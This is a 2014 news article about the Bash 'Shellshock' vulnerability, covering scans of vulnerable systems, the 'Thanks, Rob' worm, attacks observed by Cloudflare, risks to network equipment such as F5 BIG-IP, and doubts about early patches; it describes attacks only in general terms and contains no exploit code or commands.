Reports on the latest Bash bug have gone from bad to worse, as damage from the bug spreads and many early patches are proving ineffective. Unlike Heartbleed, Bash attacks allow for remote code execution, allowing an attacker to exploit the vulnerability for malware distribution. Most attacks from the bug will target web servers and network devices, with experts saying that PHP-based web applications will be particularly vulnerable. Connected devices like smart appliances are also expected to be vulnerable in the long-term, since the devices are often slow to be patched, but early reports indicate an alarming number of systems may be at risk. As Kaspersky Lab's David Jacoby put it, "the real scale of the problem is not yet clear."
"They'll likely have compromised most of the systems I've found by tomorrow morning."
In one early census, Errata Security's Robert David Graham ran a limited IP scan and found 3,000 vulnerable systems before the scan crashed, noting that embedded webservers on odd ports were particularly at risk. A few hours later, Graham discovered that someone was already using the same tactics toward less savory ends. "Someone is using masscan to deliver malware," Graham wrote in an update. "They'll likely have compromised most of the systems I've found by tomorrow morning."
The result is now known as the "Thanks, Rob" worm, and it has many experts worried about short-term attacks that might take place before devices are patched. Because most network hardware runs on UNIX-based software, a lot of the routers and switches that make up the internet will be vulnerable to the attack, allowing attacks to spiral out of control. Writing for Security Current, Richard Stiennon notes, "[This code] could quickly create a SQL Slammer type Internet meltdown," referring to a 2003 attack that dramatically slowed down global internet traffic.
Oh hey. This thing could bring down the whole internet for a few hours. I'm going to cry in the corner for a minute.— MuninrepeeK eroL (@munin) September 25, 2014
Network operators confirm that the bug is being actively exploited. The content delivery network CloudFlare rolled out web-application firewall rules yesterday to protect its sites, but since then, hackers have tried out a wide variety of attacks using the dangerous new tool. "We've seen attackers trying to grab password files, download malware onto machines, get remote access, and more," says Cloudflare's John Graham-Cumming. "There was even one attack that involved opening or closing a server's CD / DVD drive."
Higher-level network hardware may also be vulnerable. Researcher and journalist Ashkan Soltani says the most alarming attack vector he's seen is a Bash vulnerability on F5 Security's BIG IP service, which serves as a smart gateway sitting between web applications and users. The vulnerability itself is of limited-use — you'd have to be an authenticated F5 user to make the attack work — but it hints at a much larger and more troubling kind of Bash attack. "Many of the high-end networking systems are built atop a Linux / Unix platform that can often times be vulnerable," Soltani says. "A vulnerability in a core networking equipment is significantly more problematic than of a single user's computer since it allows redirection and man-in-the-middle on a mass scale."
In the short-term, we're left with a race between IT crews and malware-spreading attackers. Patches have been issued for various Linux distributions, but many in the community believe those patches will only be useful to buy time for a more permanent fix. Secunia Security has issued an advisory that the patch issued by GNU is ineffective. As another researcher wrote, "if I were a betting man, I would not bet on the fix holding up in the long haul."
9/25 12:09pm ET: Updated to include the statement from Cloudflare.